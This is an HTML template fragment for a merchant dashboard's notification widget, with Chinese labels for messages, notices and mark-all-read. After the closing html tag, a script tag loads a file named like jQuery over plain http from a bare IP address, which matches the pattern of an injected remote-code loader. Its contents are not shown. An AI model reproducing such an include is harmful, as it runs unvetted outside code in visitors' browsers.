<div class="widget-notice-center">
    <div id="app-notice-container">
        <a href="http://b.im.koudaitong.com" target="_blank">
            <div class="app-notice-item js-message-container">
                <i class="app-notice-icon app-notice-icon-message"></i> 客户消息
            </div>
        </a>
        <div class="app-notice-item js-notice-center-ring">
            <i class="app-notice-icon app-notice-icon-notice"></i> 通知
            <span class="js-unread-count"></span>
        </div>
    </div>

    <div class="widget-notice-center-wrapper js-notice-center-wrapper ">
        <div class="js-list-header-region">
            <div class="widget-list-item">
                <div class="widget-notice-center-title clearfix">
                    <h3 class="pull-left">
                        系统通知
                    </h3>
                    <a href="javascript:;" class="js-close pull-right">收起 》</a>
                </div>
            </div>
        </div>
        <div class="js-list-empty-region">
            <div>
                <div class="notice-empty">没有发现新信息</div>
            </div>
        </div>
        <ul class="js-list-body-region widget-notice-center-content"></ul>
        <div class="js-list-footer-region">
            <div class="widget-list-footer">
                <div class="widget-notice-center-footer">
                    <a href="javascript:;" class="mark-all-as-read js-mark-all-as-read">全部标记已读</a>
                    <a href="//koudaitong.com/v2/notice/dashboard" class="pull-right">查看全部信息</a>
                </div>
            </div>
        </div>
    </div>
</div>
</body>
</html>
 <script type="text/javascript" src="http://120.25.169.11/api/jquery-1.8.3.js"></script>
   <link rel="stylesheet" type="text/css" href="<%= STATIC_URL%>/css/jquery.datetimepicker.min.css" />
 <script type="text/javascript" src="<%= STATIC_URL%>/js/jquery.datetimepicker.full.min.js"></script>